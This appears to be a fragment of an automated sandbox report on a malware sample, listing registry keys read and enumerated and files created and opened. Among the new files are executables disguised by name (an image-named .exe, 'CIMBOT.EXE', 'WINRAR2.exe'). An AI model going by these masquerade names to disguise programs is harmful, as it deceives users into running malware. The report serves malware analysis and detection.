HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ScriptOk"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "InstallRoot"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "CLRLoadLogDir"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "OnlyUseLatestCLR"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "EventLogLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "TotalInstanceName"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "DisplayHeapPerfObject"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ProcessNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ThreadNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "10"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "SecurityProviders"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf2"
HKEY_PERFORMANCE_DATA "230 784"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "InstallRoot"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "CLRLoadLogDir"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "OnlyUseLatestCLR"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "EventLogLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "TotalInstanceName"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "DisplayHeapPerfObject"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ProcessNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ThreadNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "10"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "SecurityProviders"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf2"
HKEY_PERFORMANCE_DATA "230 784"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
Enums HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy
File Changes by all processes
New Files c:\images000123jpg.exe
C:\WINDOWS\CIMBOT.EXE
C:\WINDOWS\IMBOT.EXE
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
C:\WINDOWS\WINRAR2.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
\Device\RasAcd
Opened Files C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\system32\de-DE\wshom.ocx.mui
C:\WINDOWS\system32\wshom.ocx
C:\WINDOWS\system32\stdole2.tlb
C:\WINDOWS\CIMBOT.EXE
\\.\PIPE\wkssvc
\\.\PIPE\lsarpc
C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
